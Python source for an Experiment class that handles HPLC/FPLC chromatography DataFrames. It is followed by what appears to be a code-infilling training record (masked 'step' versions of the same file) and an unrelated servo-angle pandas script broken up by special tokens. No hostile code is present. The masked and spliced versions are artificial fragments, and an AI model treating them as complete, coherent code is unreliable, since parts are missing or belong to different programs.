def __init__(self, id) -> None:
self.id = id
self.version = 4
self._hplc = None
self._fplc = None
@property
def hplc(self):
try:
return self._hplc
except AttributeError:
return None
@hplc.setter
def hplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
try:
self._hplc = df.sort_values(by=["Normalization", "Channel", "mL"])
except AttributeError:
self._hplc = df
else:
raise TypeError("HPLC input is not a pandas dataframe")
@property
def fplc(self):
try:
return self._fplc
except AttributeError:
return None
@fplc.setter
def fplc(self, df):
if isinstance(df, pd.DataFrame) or df is None:
self._fplc = df
else:
raise TypeError("FPLC input is not a pandas dataframe")
@property
def wide(self):
wide = self.hplc.copy()
wide = wide.loc[wide["Normalization"] == "Signal"]
wide["Sample"] = wide["Sample"].astype(str) + " " + wide["Channel"]
wide.drop(["Channel", "Normalization"], axis=1)
wide = wide.pivot_table(index="Time", columns="Sample", values="Value")
return wide
def __repr__(self):
to_return = f'Experiment "{self.id}" with '
if self.hplc is not None:
to_return += "HPLC "
if self.hplc is not None and self.fplc is not None:
to_return += "and "
if self.fplc is not None:
to_return += "FPLC "
if self.hplc is None and self.fplc is None:
to_return += "no "
to_return += "data"
return to_return
def extend_hplc(self, hplc):
if not isinstance(hplc, pd.DataFrame):
raise TypeError(f"Tried to extend experiment hplc with {type(hplc)}")
self.hplc = pd.concat([self.hplc, hplc])
def show_tables(self):
print("HPLC:")
print(self.hplc)
print("FPLC:")
print(self.fplc)
def jsonify(self):
if self.hplc is not None:
hplc_json = (
self.hplc.pivot_table(
index=["mL", "Channel", "Time", "Normalization"],
columns="Sample",
values="Value",
)
.reset_index()
.to_json()
)
else:
hplc_json = ""
if self.fplc is not None:
fplc_json = self.fplc.to_json()
else:
fplc_json = ""
doc = {
"_id": self.id,
"version": self.version,
"hplc": hplc_json,
"fplc": fplc_json,
}
return doc
def renormalize_hplc(self, norm_range, strict):
if self.hplc is None:
raise ValueError("No HPLC data")
# this arcane string of pandas commands is the equivalent of pivot_wider from tidyverse
# from https://medium.com/@durgaswaroop/reshaping-pandas-dataframes-melt-and-unmelt-9f57518c7738;.'/
hplc = self.hplc.pivot(
index=["mL", "Sample", "Channel", "Time"], columns=["Normalization"]
)["Value"].reset_index()
hplc = hplc.groupby(["Sample", "Channel"], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict)
)
hplc = hplc.melt(
id_vars=["mL", "Sample", "Channel", "Time"],
value_vars=["Signal", "Normalized"],
var_name="Normalization",
value_name="Value",
)
self.hplc = hplc
def renormalize_fplc(self, norm_range, strict):
if self.fplc is None:
raise ValueError("No FPLC data")
fplc = self.fplc.pivot(
index=["mL", "CV", "Fraction", "Channel", "Sample"],
columns=["Normalization"],
)["Value"].reset_index()
fplc = fplc.groupby(["Sample", "Channel"], group_keys=False).apply(
lambda x: normalizer(x, norm_range, strict)
)
fplc = fplc.melt(
id_vars=["mL", "CV", "Channel", "Fraction", "Sample"],
value_vars=["Signal", "Normalized"],
var_name="Normalization",
value_name="Value",
)
self.fplc = fplc
def reduce_hplc(self, num_points):
# reduce the number of points in the hplc trace to num_points per sample/channel/norm
def reduction_factor(df, final_points):
reduction_factor = ceil(df.shape[0] / final_points)
return df[::reduction_factor]
try:
self.hplc = self.hplc.groupby(
["Channel", "Sample", "Normalization"], group_keys=False, as_index=False
).apply(lambda x: reduction_factor(x, num_points))
self.hplc = self.hplc.reset_index(drop=True)
except AttributeError:
return
def rename_channels(self, channel_name_dict):
self.hplc = self.hplc.replace({"Channel": channel_name_dict})
def hplc_csv(self, outfile):
if outfile[-4:] == ".csv":
outfile = outfile[:-4]
if self.hplc is not None:
self.hplc.to_csv(outfile + "-long.csv", index=False)
self.wide.to_csv(outfile + "-wide.csv", index=True)
return outfile + "-long.csv"
def fplc_csv(self, outfile):
if outfile[-4:] != ".csv":
outfile = outfile + ".csv"
if self.fplc is not None:
self.fplc.to_csv(outfile, index=False)
return outfile
def save_csvs(self, path):
hplc_csv = self.hplc_csv(os.path.join(path, f"{self.id}_hplc"))
fplc_csv = self.fplc_csv(os.path.join(path, f"{self.id}_fplc"))
return hplc_csv, fplc_csv
def concat_experiments(exp_list):
hplcs = []
fplcs = []
for exp in [x for x in exp_list if x.hplc is not None]:
hplc = exp.hplc
hplc["Sample"] = f"{exp.id}: " + hplc["Sample"].astype(str)
hplcs.append(hplc)
for exp in [x for x in exp_list if x.fplc is not None]:
fplc = exp.fplc
fplc["Sample"] = exp.id
fplcs.append(fplc)
concat_exp = Experiment("concat")
try:
concat_exp.hplc = pd.concat(hplcs)
except ValueError:
pass
try:
concat_exp.fplc = pd.concat(fplcs)
except ValueError:
pass
return concat_exp
|
flexible
|
{
"blob_id": "754b34028780231c7eccb98cdf3e83bd615d843f",
"index": 5276,
"step-1": "<mask token>\n\n\nclass Experiment:\n <mask token>\n <mask token>\n\n @hplc.setter\n def hplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n try:\n self._hplc = df.sort_values(by=['Normalization', 'Channel',\n 'mL'])\n except AttributeError:\n self._hplc = df\n else:\n raise TypeError('HPLC input is not a pandas dataframe')\n\n @property\n def fplc(self):\n try:\n return self._fplc\n except AttributeError:\n return None\n <mask token>\n\n @property\n def wide(self):\n wide = self.hplc.copy()\n wide = wide.loc[wide['Normalization'] == 'Signal']\n wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']\n wide.drop(['Channel', 'Normalization'], axis=1)\n wide = wide.pivot_table(index='Time', columns='Sample', values='Value')\n return wide\n\n def __repr__(self):\n to_return = f'Experiment \"{self.id}\" with '\n if self.hplc is not None:\n to_return += 'HPLC '\n if self.hplc is not None and self.fplc is not None:\n to_return += 'and '\n if self.fplc is not None:\n to_return += 'FPLC '\n if self.hplc is None and self.fplc is None:\n to_return += 'no '\n to_return += 'data'\n return to_return\n\n def extend_hplc(self, hplc):\n if not isinstance(hplc, pd.DataFrame):\n raise TypeError(\n f'Tried to extend experiment hplc with {type(hplc)}')\n self.hplc = pd.concat([self.hplc, hplc])\n <mask token>\n\n def jsonify(self):\n if self.hplc is not None:\n hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',\n 'Time', 'Normalization'], columns='Sample', values='Value'\n ).reset_index().to_json()\n else:\n hplc_json = ''\n if self.fplc is not None:\n fplc_json = self.fplc.to_json()\n else:\n fplc_json = ''\n doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,\n 'fplc': fplc_json}\n return doc\n <mask token>\n\n def renormalize_fplc(self, norm_range, strict):\n if self.fplc is None:\n raise ValueError('No FPLC data')\n fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',\n 'Sample'], columns=['Normalization'])['Value'].reset_index()\n fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',\n 'Sample'], value_vars=['Signal', 'Normalized'], var_name=\n 'Normalization', value_name='Value')\n self.fplc = fplc\n\n def reduce_hplc(self, num_points):\n\n def reduction_factor(df, final_points):\n reduction_factor = ceil(df.shape[0] / final_points)\n return df[::reduction_factor]\n try:\n self.hplc = self.hplc.groupby(['Channel', 'Sample',\n 'Normalization'], group_keys=False, as_index=False).apply(\n lambda x: reduction_factor(x, num_points))\n self.hplc = self.hplc.reset_index(drop=True)\n except AttributeError:\n return\n\n def rename_channels(self, channel_name_dict):\n self.hplc = self.hplc.replace({'Channel': channel_name_dict})\n\n def hplc_csv(self, outfile):\n if outfile[-4:] == '.csv':\n outfile = outfile[:-4]\n if self.hplc is not None:\n self.hplc.to_csv(outfile + '-long.csv', index=False)\n self.wide.to_csv(outfile + '-wide.csv', index=True)\n return outfile + '-long.csv'\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Experiment:\n\n def __init__(self, id) ->None:\n self.id = id\n self.version = 4\n self._hplc = None\n self._fplc = None\n\n @property\n def hplc(self):\n try:\n return self._hplc\n except AttributeError:\n return None\n\n @hplc.setter\n def hplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n try:\n self._hplc = df.sort_values(by=['Normalization', 'Channel',\n 'mL'])\n except AttributeError:\n self._hplc = df\n else:\n raise TypeError('HPLC input is not a pandas dataframe')\n\n @property\n def fplc(self):\n try:\n return self._fplc\n except AttributeError:\n return None\n <mask token>\n\n @property\n def wide(self):\n wide = self.hplc.copy()\n wide = wide.loc[wide['Normalization'] == 'Signal']\n wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']\n wide.drop(['Channel', 'Normalization'], axis=1)\n wide = wide.pivot_table(index='Time', columns='Sample', values='Value')\n return wide\n\n def __repr__(self):\n to_return = f'Experiment \"{self.id}\" with '\n if self.hplc is not None:\n to_return += 'HPLC '\n if self.hplc is not None and self.fplc is not None:\n to_return += 'and '\n if self.fplc is not None:\n to_return += 'FPLC '\n if self.hplc is None and self.fplc is None:\n to_return += 'no '\n to_return += 'data'\n return to_return\n\n def extend_hplc(self, hplc):\n if not isinstance(hplc, pd.DataFrame):\n raise TypeError(\n f'Tried to extend experiment hplc with {type(hplc)}')\n self.hplc = pd.concat([self.hplc, hplc])\n <mask token>\n\n def jsonify(self):\n if self.hplc is not None:\n hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',\n 'Time', 'Normalization'], columns='Sample', values='Value'\n ).reset_index().to_json()\n else:\n hplc_json = ''\n if self.fplc is not None:\n fplc_json = self.fplc.to_json()\n else:\n fplc_json = ''\n doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,\n 'fplc': fplc_json}\n return doc\n\n def renormalize_hplc(self, norm_range, strict):\n if self.hplc is None:\n raise ValueError('No HPLC data')\n hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],\n columns=['Normalization'])['Value'].reset_index()\n hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],\n value_vars=['Signal', 'Normalized'], var_name='Normalization',\n value_name='Value')\n self.hplc = hplc\n\n def renormalize_fplc(self, norm_range, strict):\n if self.fplc is None:\n raise ValueError('No FPLC data')\n fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',\n 'Sample'], columns=['Normalization'])['Value'].reset_index()\n fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',\n 'Sample'], value_vars=['Signal', 'Normalized'], var_name=\n 'Normalization', value_name='Value')\n self.fplc = fplc\n\n def reduce_hplc(self, num_points):\n\n def reduction_factor(df, final_points):\n reduction_factor = ceil(df.shape[0] / final_points)\n return df[::reduction_factor]\n try:\n self.hplc = self.hplc.groupby(['Channel', 'Sample',\n 'Normalization'], group_keys=False, as_index=False).apply(\n lambda x: reduction_factor(x, num_points))\n self.hplc = self.hplc.reset_index(drop=True)\n except AttributeError:\n return\n\n def rename_channels(self, channel_name_dict):\n self.hplc = self.hplc.replace({'Channel': channel_name_dict})\n\n def hplc_csv(self, outfile):\n if outfile[-4:] == '.csv':\n outfile = outfile[:-4]\n if self.hplc is not None:\n self.hplc.to_csv(outfile + '-long.csv', index=False)\n self.wide.to_csv(outfile + '-wide.csv', index=True)\n return outfile + '-long.csv'\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Experiment:\n\n def __init__(self, id) ->None:\n self.id = id\n self.version = 4\n self._hplc = None\n self._fplc = None\n\n @property\n def hplc(self):\n try:\n return self._hplc\n except AttributeError:\n return None\n\n @hplc.setter\n def hplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n try:\n self._hplc = df.sort_values(by=['Normalization', 'Channel',\n 'mL'])\n except AttributeError:\n self._hplc = df\n else:\n raise TypeError('HPLC input is not a pandas dataframe')\n\n @property\n def fplc(self):\n try:\n return self._fplc\n except AttributeError:\n return None\n\n @fplc.setter\n def fplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n self._fplc = df\n else:\n raise TypeError('FPLC input is not a pandas dataframe')\n\n @property\n def wide(self):\n wide = self.hplc.copy()\n wide = wide.loc[wide['Normalization'] == 'Signal']\n wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']\n wide.drop(['Channel', 'Normalization'], axis=1)\n wide = wide.pivot_table(index='Time', columns='Sample', values='Value')\n return wide\n\n def __repr__(self):\n to_return = f'Experiment \"{self.id}\" with '\n if self.hplc is not None:\n to_return += 'HPLC '\n if self.hplc is not None and self.fplc is not None:\n to_return += 'and '\n if self.fplc is not None:\n to_return += 'FPLC '\n if self.hplc is None and self.fplc is None:\n to_return += 'no '\n to_return += 'data'\n return to_return\n\n def extend_hplc(self, hplc):\n if not isinstance(hplc, pd.DataFrame):\n raise TypeError(\n f'Tried to extend experiment hplc with {type(hplc)}')\n self.hplc = pd.concat([self.hplc, hplc])\n\n def show_tables(self):\n print('HPLC:')\n print(self.hplc)\n print('FPLC:')\n print(self.fplc)\n\n def jsonify(self):\n if self.hplc is not None:\n hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',\n 'Time', 'Normalization'], columns='Sample', values='Value'\n ).reset_index().to_json()\n else:\n hplc_json = ''\n if self.fplc is not None:\n fplc_json = self.fplc.to_json()\n else:\n fplc_json = ''\n doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,\n 'fplc': fplc_json}\n return doc\n\n def renormalize_hplc(self, norm_range, strict):\n if self.hplc is None:\n raise ValueError('No HPLC data')\n hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],\n columns=['Normalization'])['Value'].reset_index()\n hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],\n value_vars=['Signal', 'Normalized'], var_name='Normalization',\n value_name='Value')\n self.hplc = hplc\n\n def renormalize_fplc(self, norm_range, strict):\n if self.fplc is None:\n raise ValueError('No FPLC data')\n fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',\n 'Sample'], columns=['Normalization'])['Value'].reset_index()\n fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',\n 'Sample'], value_vars=['Signal', 'Normalized'], var_name=\n 'Normalization', value_name='Value')\n self.fplc = fplc\n\n def reduce_hplc(self, num_points):\n\n def reduction_factor(df, final_points):\n reduction_factor = ceil(df.shape[0] / final_points)\n return df[::reduction_factor]\n try:\n self.hplc = self.hplc.groupby(['Channel', 'Sample',\n 'Normalization'], group_keys=False, as_index=False).apply(\n lambda x: reduction_factor(x, num_points))\n self.hplc = self.hplc.reset_index(drop=True)\n except AttributeError:\n return\n\n def rename_channels(self, channel_name_dict):\n self.hplc = self.hplc.replace({'Channel': channel_name_dict})\n\n def hplc_csv(self, outfile):\n if outfile[-4:] == '.csv':\n outfile = outfile[:-4]\n if self.hplc is not None:\n self.hplc.to_csv(outfile + '-long.csv', index=False)\n self.wide.to_csv(outfile + '-wide.csv', index=True)\n return outfile + '-long.csv'\n\n def fplc_csv(self, outfile):\n if outfile[-4:] != '.csv':\n outfile = outfile + '.csv'\n if self.fplc is not None:\n self.fplc.to_csv(outfile, index=False)\n return outfile\n\n def save_csvs(self, path):\n hplc_csv = self.hplc_csv(os.path.join(path, f'{self.id}_hplc'))\n fplc_csv = self.fplc_csv(os.path.join(path, f'{self.id}_fplc'))\n return hplc_csv, fplc_csv\n\n\ndef concat_experiments(exp_list):\n hplcs = []\n fplcs = []\n for exp in [x for x in exp_list if x.hplc is not None]:\n hplc = exp.hplc\n hplc['Sample'] = f'{exp.id}: ' + hplc['Sample'].astype(str)\n hplcs.append(hplc)\n for exp in [x for x in exp_list if x.fplc is not None]:\n fplc = exp.fplc\n fplc['Sample'] = exp.id\n fplcs.append(fplc)\n concat_exp = Experiment('concat')\n try:\n concat_exp.hplc = pd.concat(hplcs)\n except ValueError:\n pass\n try:\n concat_exp.fplc = pd.concat(fplcs)\n except ValueError:\n pass\n return concat_exp\n",
"step-4": "import pandas as pd\nimport os\nfrom appia.processors.core import normalizer\nfrom math import ceil\n\n\nclass Experiment:\n\n def __init__(self, id) ->None:\n self.id = id\n self.version = 4\n self._hplc = None\n self._fplc = None\n\n @property\n def hplc(self):\n try:\n return self._hplc\n except AttributeError:\n return None\n\n @hplc.setter\n def hplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n try:\n self._hplc = df.sort_values(by=['Normalization', 'Channel',\n 'mL'])\n except AttributeError:\n self._hplc = df\n else:\n raise TypeError('HPLC input is not a pandas dataframe')\n\n @property\n def fplc(self):\n try:\n return self._fplc\n except AttributeError:\n return None\n\n @fplc.setter\n def fplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n self._fplc = df\n else:\n raise TypeError('FPLC input is not a pandas dataframe')\n\n @property\n def wide(self):\n wide = self.hplc.copy()\n wide = wide.loc[wide['Normalization'] == 'Signal']\n wide['Sample'] = wide['Sample'].astype(str) + ' ' + wide['Channel']\n wide.drop(['Channel', 'Normalization'], axis=1)\n wide = wide.pivot_table(index='Time', columns='Sample', values='Value')\n return wide\n\n def __repr__(self):\n to_return = f'Experiment \"{self.id}\" with '\n if self.hplc is not None:\n to_return += 'HPLC '\n if self.hplc is not None and self.fplc is not None:\n to_return += 'and '\n if self.fplc is not None:\n to_return += 'FPLC '\n if self.hplc is None and self.fplc is None:\n to_return += 'no '\n to_return += 'data'\n return to_return\n\n def extend_hplc(self, hplc):\n if not isinstance(hplc, pd.DataFrame):\n raise TypeError(\n f'Tried to extend experiment hplc with {type(hplc)}')\n self.hplc = pd.concat([self.hplc, hplc])\n\n def show_tables(self):\n print('HPLC:')\n print(self.hplc)\n print('FPLC:')\n print(self.fplc)\n\n def jsonify(self):\n if self.hplc is not None:\n hplc_json = self.hplc.pivot_table(index=['mL', 'Channel',\n 'Time', 'Normalization'], columns='Sample', values='Value'\n ).reset_index().to_json()\n else:\n hplc_json = ''\n if self.fplc is not None:\n fplc_json = self.fplc.to_json()\n else:\n fplc_json = ''\n doc = {'_id': self.id, 'version': self.version, 'hplc': hplc_json,\n 'fplc': fplc_json}\n return doc\n\n def renormalize_hplc(self, norm_range, strict):\n if self.hplc is None:\n raise ValueError('No HPLC data')\n hplc = self.hplc.pivot(index=['mL', 'Sample', 'Channel', 'Time'],\n columns=['Normalization'])['Value'].reset_index()\n hplc = hplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n hplc = hplc.melt(id_vars=['mL', 'Sample', 'Channel', 'Time'],\n value_vars=['Signal', 'Normalized'], var_name='Normalization',\n value_name='Value')\n self.hplc = hplc\n\n def renormalize_fplc(self, norm_range, strict):\n if self.fplc is None:\n raise ValueError('No FPLC data')\n fplc = self.fplc.pivot(index=['mL', 'CV', 'Fraction', 'Channel',\n 'Sample'], columns=['Normalization'])['Value'].reset_index()\n fplc = fplc.groupby(['Sample', 'Channel'], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict))\n fplc = fplc.melt(id_vars=['mL', 'CV', 'Channel', 'Fraction',\n 'Sample'], value_vars=['Signal', 'Normalized'], var_name=\n 'Normalization', value_name='Value')\n self.fplc = fplc\n\n def reduce_hplc(self, num_points):\n\n def reduction_factor(df, final_points):\n reduction_factor = ceil(df.shape[0] / final_points)\n return df[::reduction_factor]\n try:\n self.hplc = self.hplc.groupby(['Channel', 'Sample',\n 'Normalization'], group_keys=False, as_index=False).apply(\n lambda x: reduction_factor(x, num_points))\n self.hplc = self.hplc.reset_index(drop=True)\n except AttributeError:\n return\n\n def rename_channels(self, channel_name_dict):\n self.hplc = self.hplc.replace({'Channel': channel_name_dict})\n\n def hplc_csv(self, outfile):\n if outfile[-4:] == '.csv':\n outfile = outfile[:-4]\n if self.hplc is not None:\n self.hplc.to_csv(outfile + '-long.csv', index=False)\n self.wide.to_csv(outfile + '-wide.csv', index=True)\n return outfile + '-long.csv'\n\n def fplc_csv(self, outfile):\n if outfile[-4:] != '.csv':\n outfile = outfile + '.csv'\n if self.fplc is not None:\n self.fplc.to_csv(outfile, index=False)\n return outfile\n\n def save_csvs(self, path):\n hplc_csv = self.hplc_csv(os.path.join(path, f'{self.id}_hplc'))\n fplc_csv = self.fplc_csv(os.path.join(path, f'{self.id}_fplc'))\n return hplc_csv, fplc_csv\n\n\ndef concat_experiments(exp_list):\n hplcs = []\n fplcs = []\n for exp in [x for x in exp_list if x.hplc is not None]:\n hplc = exp.hplc\n hplc['Sample'] = f'{exp.id}: ' + hplc['Sample'].astype(str)\n hplcs.append(hplc)\n for exp in [x for x in exp_list if x.fplc is not None]:\n fplc = exp.fplc\n fplc['Sample'] = exp.id\n fplcs.append(fplc)\n concat_exp = Experiment('concat')\n try:\n concat_exp.hplc = pd.concat(hplcs)\n except ValueError:\n pass\n try:\n concat_exp.fplc = pd.concat(fplcs)\n except ValueError:\n pass\n return concat_exp\n",
"step-5": "import pandas as pd\nimport os\nfrom appia.processors.core import normalizer\nfrom math import ceil\n\n\nclass Experiment:\n def __init__(self, id) -> None:\n self.id = id\n self.version = 4\n self._hplc = None\n self._fplc = None\n\n @property\n def hplc(self):\n try:\n return self._hplc\n except AttributeError:\n return None\n\n @hplc.setter\n def hplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n try:\n self._hplc = df.sort_values(by=[\"Normalization\", \"Channel\", \"mL\"])\n except AttributeError:\n self._hplc = df\n else:\n raise TypeError(\"HPLC input is not a pandas dataframe\")\n\n @property\n def fplc(self):\n try:\n return self._fplc\n except AttributeError:\n return None\n\n @fplc.setter\n def fplc(self, df):\n if isinstance(df, pd.DataFrame) or df is None:\n self._fplc = df\n else:\n raise TypeError(\"FPLC input is not a pandas dataframe\")\n\n @property\n def wide(self):\n wide = self.hplc.copy()\n wide = wide.loc[wide[\"Normalization\"] == \"Signal\"]\n wide[\"Sample\"] = wide[\"Sample\"].astype(str) + \" \" + wide[\"Channel\"]\n wide.drop([\"Channel\", \"Normalization\"], axis=1)\n wide = wide.pivot_table(index=\"Time\", columns=\"Sample\", values=\"Value\")\n return wide\n\n def __repr__(self):\n to_return = f'Experiment \"{self.id}\" with '\n if self.hplc is not None:\n to_return += \"HPLC \"\n if self.hplc is not None and self.fplc is not None:\n to_return += \"and \"\n if self.fplc is not None:\n to_return += \"FPLC \"\n if self.hplc is None and self.fplc is None:\n to_return += \"no \"\n to_return += \"data\"\n\n return to_return\n\n def extend_hplc(self, hplc):\n if not isinstance(hplc, pd.DataFrame):\n raise TypeError(f\"Tried to extend experiment hplc with {type(hplc)}\")\n\n self.hplc = pd.concat([self.hplc, hplc])\n\n def show_tables(self):\n print(\"HPLC:\")\n print(self.hplc)\n print(\"FPLC:\")\n print(self.fplc)\n\n def jsonify(self):\n if self.hplc is not None:\n hplc_json = (\n self.hplc.pivot_table(\n index=[\"mL\", \"Channel\", \"Time\", \"Normalization\"],\n columns=\"Sample\",\n values=\"Value\",\n )\n .reset_index()\n .to_json()\n )\n else:\n hplc_json = \"\"\n\n if self.fplc is not None:\n fplc_json = self.fplc.to_json()\n else:\n fplc_json = \"\"\n\n doc = {\n \"_id\": self.id,\n \"version\": self.version,\n \"hplc\": hplc_json,\n \"fplc\": fplc_json,\n }\n\n return doc\n\n def renormalize_hplc(self, norm_range, strict):\n if self.hplc is None:\n raise ValueError(\"No HPLC data\")\n\n # this arcane string of pandas commands is the equivalent of pivot_wider from tidyverse\n # from https://medium.com/@durgaswaroop/reshaping-pandas-dataframes-melt-and-unmelt-9f57518c7738;.'/\n hplc = self.hplc.pivot(\n index=[\"mL\", \"Sample\", \"Channel\", \"Time\"], columns=[\"Normalization\"]\n )[\"Value\"].reset_index()\n hplc = hplc.groupby([\"Sample\", \"Channel\"], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict)\n )\n hplc = hplc.melt(\n id_vars=[\"mL\", \"Sample\", \"Channel\", \"Time\"],\n value_vars=[\"Signal\", \"Normalized\"],\n var_name=\"Normalization\",\n value_name=\"Value\",\n )\n self.hplc = hplc\n\n def renormalize_fplc(self, norm_range, strict):\n if self.fplc is None:\n raise ValueError(\"No FPLC data\")\n\n fplc = self.fplc.pivot(\n index=[\"mL\", \"CV\", \"Fraction\", \"Channel\", \"Sample\"],\n columns=[\"Normalization\"],\n )[\"Value\"].reset_index()\n fplc = fplc.groupby([\"Sample\", \"Channel\"], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict)\n )\n fplc = fplc.melt(\n id_vars=[\"mL\", \"CV\", \"Channel\", \"Fraction\", \"Sample\"],\n value_vars=[\"Signal\", \"Normalized\"],\n var_name=\"Normalization\",\n value_name=\"Value\",\n )\n self.fplc = fplc\n\n def reduce_hplc(self, num_points):\n # reduce the number of points in the hplc trace to num_points per sample/channel/norm\n\n def reduction_factor(df, final_points):\n reduction_factor = ceil(df.shape[0] / final_points)\n return df[::reduction_factor]\n\n try:\n self.hplc = self.hplc.groupby(\n [\"Channel\", \"Sample\", \"Normalization\"], group_keys=False, as_index=False\n ).apply(lambda x: reduction_factor(x, num_points))\n self.hplc = self.hplc.reset_index(drop=True)\n except AttributeError:\n return\n\n def rename_channels(self, channel_name_dict):\n self.hplc = self.hplc.replace({\"Channel\": channel_name_dict})\n\n def hplc_csv(self, outfile):\n if outfile[-4:] == \".csv\":\n outfile = outfile[:-4]\n if self.hplc is not None:\n self.hplc.to_csv(outfile + \"-long.csv\", index=False)\n self.wide.to_csv(outfile + \"-wide.csv\", index=True)\n\n return outfile + \"-long.csv\"\n\n def fplc_csv(self, outfile):\n if outfile[-4:] != \".csv\":\n outfile = outfile + \".csv\"\n\n if self.fplc is not None:\n self.fplc.to_csv(outfile, index=False)\n return outfile\n\n def save_csvs(self, path):\n hplc_csv = self.hplc_csv(os.path.join(path, f\"{self.id}_hplc\"))\n fplc_csv = self.fplc_csv(os.path.join(path, f\"{self.id}_fplc\"))\n\n return hplc_csv, fplc_csv\n\n\ndef concat_experiments(exp_list):\n hplcs = []\n fplcs = []\n\n for exp in [x for x in exp_list if x.hplc is not None]:\n hplc = exp.hplc\n hplc[\"Sample\"] = f\"{exp.id}: \" + hplc[\"Sample\"].astype(str)\n hplcs.append(hplc)\n\n for exp in [x for x in exp_list if x.fplc is not None]:\n fplc = exp.fplc\n fplc[\"Sample\"] = exp.id\n fplcs.append(fplc)\n\n concat_exp = Experiment(\"concat\")\n try:\n concat_exp.hplc = pd.concat(hplcs)\n except ValueError:\n pass\n\n try:\n concat_exp.fplc = pd.concat(fplcs)\n except ValueError:\n pass\n\n return concat_exp\n",
"step-ids": [
11,
14,
19,
20,
21
]
}
|
[
11,
14,
19,
20,
21
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
plt.scatter(df['left_rel_angle'], df['right_rel_angle'])
plt.xlabel('Left servo angle(deg)')
plt.ylabel('Right servo angle(deg)')
plt.title('Plot of left and right servo values')
plt.show()
plt.scatter(df['roll'], df['pitch'])
plt.xlabel('Roll(deg)')
plt.ylabel('Pitch(deg)')
plt.title('Plot of roll and pitch values')
plt.show()
<|reserved_special_token_0|>
df_sorted_left.bfill(axis='columns', inplace=True)
df_sorted_left.ffill(axis='columns', inplace=True)
df_sorted_right.bfill(axis='columns', inplace=True)
df_sorted_right.ffill(axis='columns', inplace=True)
<|reserved_special_token_0|>
df_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')
df_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')
<|reserved_special_token_0|>
for i in range(-55, 52):
row = []
for j in range(-21, 23):
tup = df_sorted_left[j][i], df_sorted_right[j][i]
row.append(tup)
data.append(row)
<|reserved_special_token_0|>
df_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
df = pd.read_csv(
'C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv'
)
df = df.apply(pd.to_numeric, errors='coerce')
df = df.dropna()
plt.scatter(df['left_rel_angle'], df['right_rel_angle'])
plt.xlabel('Left servo angle(deg)')
plt.ylabel('Right servo angle(deg)')
plt.title('Plot of left and right servo values')
plt.show()
plt.scatter(df['roll'], df['pitch'])
plt.xlabel('Roll(deg)')
plt.ylabel('Pitch(deg)')
plt.title('Plot of roll and pitch values')
plt.show()
df['roll'] = df['roll'].astype('int8')
df['pitch'] = df['pitch'].astype('int8')
df_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)
df_sorted = df.groupby(['pitch', 'roll']).mean().reset_index()
df_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')
df_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')
df_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']
].apply(tuple, axis=1)
df_sorted_left = df_sorted.pivot(index='pitch', columns='roll', values=
'left_rel_angle')
df_sorted_right = df_sorted.pivot(index='pitch', columns='roll', values=
'right_rel_angle')
df_sorted_left.bfill(axis='columns', inplace=True)
df_sorted_left.ffill(axis='columns', inplace=True)
df_sorted_right.bfill(axis='columns', inplace=True)
df_sorted_right.ffill(axis='columns', inplace=True)
df_sorted_left = df_sorted_left.astype('int8')
df_sorted_right = df_sorted_right.astype('int8')
